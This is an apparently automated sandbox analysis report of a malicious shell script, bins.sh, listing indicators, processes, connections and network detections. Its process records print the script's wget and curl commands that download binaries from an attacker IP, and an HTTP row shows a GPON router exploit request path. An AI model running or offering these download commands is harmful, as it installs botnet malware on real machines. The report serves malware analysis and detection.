File name: bins.sh
Full analysis: https://app.any.run/tasks/3084eeb3-d6a1-4845-a923-f8721a6e9258
Verdict: Malicious activity
Analysis date: December 14, 2024, 00:58:37
OS: Ubuntu 22.04.2 LTS
Tags: exploit
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable, with very long lines (405)
MD5: 1BF98EC0F208DAADC02C99C268E05E7F
SHA1: F01A22BC4E069C72BBA4D5913A647460D229D3D6
SHA256: C95B5862E15714E933D052115B87EBD97BE2CD1B93584D18AD18A6F5956A1980
SSDEEP: 192:ULUNp4xZUpmexeaW6dioIVNoIeJfNp4xZumexeaz:ULUNp4xZUC6dioIVNoIeJfNp4xZw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • EXPLOIT has been detected (SURICATA)

      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38973)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38974)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39009)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39064)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39020)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39065)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39010)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39071)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39075)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39070)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39078)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39093)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39098)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39103)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39097)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39094)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39102)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39090)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39106)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39074)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39079)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39107)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39111)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39108)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39112)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39115)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39116)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39019)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39123)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39132)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39127)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39124)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39131)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39089)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39137)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39136)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39141)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39140)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39145)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39146)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39154)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39153)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39150)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39119)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39120)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39162)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39163)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39158)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39128)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39157)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39149)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39088)
  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 38740)
    • Potential Corporate Privacy Violation

      • wget (PID: 38796)
      • wget (PID: 38747)
      • wget (PID: 39008)
      • wget (PID: 38972)
      • wget (PID: 39045)
      • busybox (PID: 39040)
      • busybox (PID: 38856)
      • busybox (PID: 38967)
      • busybox (PID: 39003)
      • busybox (PID: 38822)
      • busybox (PID: 38791)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 38744)
    • Executes commands using command-line interpreter

      • sudo (PID: 38743)
    • Uses wget to download content

      • bash (PID: 38744)
    • Connects to unusual port

      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38860)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38858)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38868)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38866)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38864)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38862)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38865)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38857)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38867)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38861)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38863)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38870)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38878)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38877)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38871)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38883)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38882)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38873)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38874)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38884)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38888)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38876)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38889)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38881)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38880)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38872)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38875)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38887)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38885)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38894)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38892)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38890)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38886)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38891)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38895)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38893)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38896)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38897)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38901)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38898)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38905)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38899)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38909)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38903)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38902)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38906)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38904)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38907)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38900)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38910)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38908)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38911)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38913)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38917)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38915)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38919)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38922)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38925)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38923)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38929)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38916)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38920)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38927)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38932)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38918)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38921)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38924)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38912)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38930)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38926)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38931)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38914)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38933)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38934)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38935)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38936)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38937)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38928)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38938)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39088)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39101)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38939)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39106)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39144)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39161)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .sh | Linux/UNIX shell script (100)
No data.
All screenshots are available in the full report
Total processes: 466
Monitored processes: 258
Malicious processes: 138
Suspicious processes: 2

Behavior graph

The graph is interactive in the full report; only its flattened node list survived here. Nodes in order of first appearance: start, dash, sudo, chown, chmod, bash, locale-check, rm, wget, snap, snap-seccomp, tracker-extract-3, snap-confine, dumpe2fs, snap-update-ns, busybox, nnliahv8ft3p36ufldntuibhoxh0jujhhb, h05dlumwbs5nidamuwe36sfjp7esrqlzax. The chain "bash -> rm -> wget -> snap/busybox -> chmod -> nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted)" repeats several times, and the many nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nodes are the ones tagged #EXPLOIT; nodes marked "no specs" carried no indicators.

Process information

PID 38739
  CMD: /bin/sh -c "sudo chown user /tmp/bins\.sh && chmod +x /tmp/bins\.sh && DISPLAY=:0 sudo -iu user /tmp/bins\.sh "
  Path: /usr/bin/dash
  Parent process: any-guest-agent
  User: root
  Integrity Level: UNKNOWN

PID 38740
  CMD: sudo chown user /tmp/bins.sh
  Path: /usr/bin/sudo
  Parent process: dash
  User: root
  Integrity Level: UNKNOWN
  Exit code: 0

PID 38741
  CMD: chown user /tmp/bins.sh
  Path: /usr/bin/chown
  Parent process: sudo
  User: root
  Integrity Level: UNKNOWN
  Exit code: 0

PID 38742
  CMD: chmod +x /tmp/bins.sh
  Path: /usr/bin/chmod
  Parent process: dash
  User: root
  Integrity Level: UNKNOWN
  Exit code: 0

PID 38743
  CMD: sudo -iu user /tmp/bins.sh
  Path: /usr/bin/sudo
  Parent process: dash
  User: root
  Integrity Level: UNKNOWN

PID 38744
  CMD: /bin/bash /tmp/bins.sh
  Path: /usr/bin/bash
  Parent process: sudo
  User: user
  Integrity Level: UNKNOWN

PID 38745
  CMD: /usr/bin/locale-check C.UTF-8
  Path: /usr/bin/locale-check
  Parent process: bash
  User: user
  Integrity Level: UNKNOWN
  Exit code: 0

PID 38746
  CMD: /bin/rm bins.sh
  Path: /usr/bin/rm
  Parent process: bash
  User: user
  Integrity Level: UNKNOWN
  Exit code: 256

PID 38747
  CMD: wget http://37.44.238.68/bins/flFp11gOKS5O1KbuHBReEPxs9O6CXUsqN4
  Path: /usr/bin/wget
  Parent process: bash
  User: user
  Integrity Level: UNKNOWN
  Exit code: 0

PID 38748
  CMD: curl -O http://37.44.238.68/bins/flFp11gOKS5O1KbuHBReEPxs9O6CXUsqN4
  Path: /snap/snapd/20290/usr/bin/snap
  Parent process: bash
  User: user
  Integrity Level: UNKNOWN
  Exit code: 0
Dropped files

No data (Executable files: 0, Suspicious files: 0, Text files: 0, Unknown types: 0)
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 95
TCP/UDP connections: 13 646
DNS requests: 8
Threats: 125

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN / Reputation
38967 | busybox | GET | | 37.44.238.68:80 | http://37.44.238.68/bins/vvOzd21gp1VMiBa4WKG078qzhKaDahP2IQ | unknown
| | GET | | 37.44.238.68:80 | http://37.44.238.68/bins/4muyoQFtQu8OaZsYKV4wOsXp18QNsxRCaK | unknown
| | GET | 204 | 185.125.190.96:80 | http://connectivity-check.ubuntu.com/ | unknown, whitelisted
38822 | busybox | GET | | 37.44.238.68:80 | http://37.44.238.68/bins/NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB | unknown
38856 | busybox | GET | | 37.44.238.68:80 | http://37.44.238.68/bins/h05dLumwbS5NIdaMUwe36sFjp7EsrqlZaX | unknown
38791 | busybox | GET | | 37.44.238.68:80 | http://37.44.238.68/bins/flFp11gOKS5O1KbuHBReEPxs9O6CXUsqN4 | unknown
39003 | busybox | GET | | 37.44.238.68:80 | http://37.44.238.68/bins/4muyoQFtQu8OaZsYKV4wOsXp18QNsxRCaK | unknown
38973 | NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) | POST | 404 | 38.165.113.225:80 | http://127.0.0.1:80/GponForm/diag_Form?images/ | unknown
| | GET | 200 | 37.44.238.68:80 | http://37.44.238.68/bins/NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB | unknown
| | GET | 200 | 37.44.238.68:80 | http://37.44.238.68/bins/h05dLumwbS5NIdaMUwe36sFjp7EsrqlZaX | unknown

(Rows with an empty PID/Process cell were listed without those values in the report; the Type and Size columns were empty for every row.)

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
484 | avahi-daemon | 224.0.0.251:5353 | | | | unknown
| | 185.125.190.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
| | 91.189.91.97:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
| | 185.125.190.96:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
38747 | wget | 37.44.238.68:80 | conn.masjesu.zip | Harmony Hosting SARL | FR | unknown
| | 37.44.238.68:80 | conn.masjesu.zip | Harmony Hosting SARL | FR | unknown
38791 | busybox | 37.44.238.68:80 | conn.masjesu.zip | Harmony Hosting SARL | FR | unknown
38796 | wget | 37.44.238.68:80 | conn.masjesu.zip | Harmony Hosting SARL | FR | unknown
38822 | busybox | 37.44.238.68:80 | conn.masjesu.zip | Harmony Hosting SARL | FR | unknown
38830 | wget | 37.44.238.68:80 | conn.masjesu.zip | Harmony Hosting SARL | FR | unknown

(Rows with an empty PID/Process cell were listed without those values in the report.)

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.74.206
  • 2a00:1450:4001:830::200e
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.96
  • 91.189.91.97
  • 185.125.190.48
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.17
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.97
  • 91.189.91.48
  • 185.125.190.18
  • 185.125.190.49
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::23
whitelisted
conn.masjesu.zip
  • 37.44.238.68
  • 87.121.86.228
unknown
170.100.168.192.in-addr.arpa
unknown

Threats

Class | Message
Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
Misc Attack | ET COMPROMISED Known Compromised or Hostile Host Traffic group 18
Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
Misc activity | ET INFO Observed DNS Query to .zip TLD
Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad

(The PID and Process columns were empty for every row in the report.)
1 ETPRO signatures available at the full report
No debug info